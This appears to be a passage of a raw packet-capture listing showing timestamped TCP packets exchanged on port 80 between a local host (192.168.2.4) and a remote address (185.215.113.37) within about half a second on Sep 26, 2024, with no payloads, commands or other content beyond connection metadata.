Sep 26, 2024 00:39:13.240820885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.240849018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.240860939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.240864992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.240884066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.240895033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.240912914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.240912914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.240974903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.240983963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.240995884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241014004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241027117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241074085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241106987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241142988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241306067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241321087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241328001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241329908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241334915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241342068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241364002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241364002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241411924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241771936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241784096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241797924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241805077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241808891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241810083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241811991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241817951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241828918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241837025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241841078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241852999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241864920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.241871119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241887093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.241921902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.247548103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.247575045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.247579098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.247656107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.249574900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.249577045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.249636889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.284584045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.284600973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.284614086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.284625053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.284729004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.284849882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.359855890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359873056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359884977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359895945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359905958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359916925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359930038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359945059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.359966040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.359966040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.360002041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.360692024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.360704899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.360719919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.360750914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.360800982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.360841036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.360843897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.360856056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.360909939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.360910892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.362768888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362811089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362823009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362859011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.362867117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362879038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362893105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362904072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362912893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.362919092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.362962961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.362962961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363149881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363162041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363177061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363239050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363239050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363262892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363276005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363292933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363301039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363312006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363317966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363317966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363358974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363380909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363399029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363411903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363420963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363430977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363445044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363446951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363446951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363456011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363468885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363478899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363507986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363507986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363588095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363599062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363614082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363617897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363625050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363631010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363636017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363636971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363642931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363650084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363657951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363679886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363698006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363776922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363790035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363801003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.363827944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.363939047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364078999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364099026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364108086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364125967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364165068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364295006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364306927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364319086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364335060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364377975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364413977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364424944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364437103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364448071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364470005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364476919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364485025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364495993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364507914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364526987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364533901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364541054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364553928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.364557981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364603996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.364603996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.376801014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.376813889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.376826048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.376882076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.376941919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.407491922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.407507896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.407521009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.407532930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.407612085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.407639980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623745918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623764992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623821020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623832941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623843908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623843908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623843908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623856068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623866081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623893023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623893023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623893023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623907089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623918056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623929024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623929024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623929024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623940945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623950958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623960972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623976946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.623980045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.623992920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624002934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624015093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624015093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624017954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624027967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624044895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624054909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624063969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624074936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624082088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624082088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624087095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624130011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624130011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624175072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624186993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624197006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624206066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624217033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624222040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624228954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624239922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624249935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624260902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624286890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624286890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624408007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624418974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624429941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624447107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624455929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624455929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624464989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624475002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624475002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624486923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624496937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624506950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624517918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624528885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624531984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624531984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624541044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624552011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624562979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624568939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624571085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624581099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624587059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624592066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624598026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624646902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624646902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624665976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624677896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624689102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624716997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624739885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624749899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624758959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624761105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624771118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624782085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624793053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624805927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624810934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624811888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624815941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624828100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624857903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624857903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.624965906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624975920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624984980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.624996901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625006914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625016928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625024080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625027895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625040054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625040054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625052929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625063896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625073910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625081062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625081062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625083923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625093937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625103951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625114918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625119925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625119925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625127077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625137091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625145912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625155926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625166893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625178099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625214100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625214100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625262022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625291109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625303030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625313044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625324011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625334024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625344038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625355959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625370026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625370026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625395060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625406027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625422001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625432014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625432968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625432014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625444889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625456095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625463963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625468016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625520945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625520945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625587940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625617981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625627995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625638962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625648022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625655890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625655890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625658989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625672102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625674009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625688076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625699043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625709057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625719070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625720024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625720024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:13.625729084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625740051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625751019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:13.625762939 CEST	80	49730	185.215.113.37	192.168.2.4
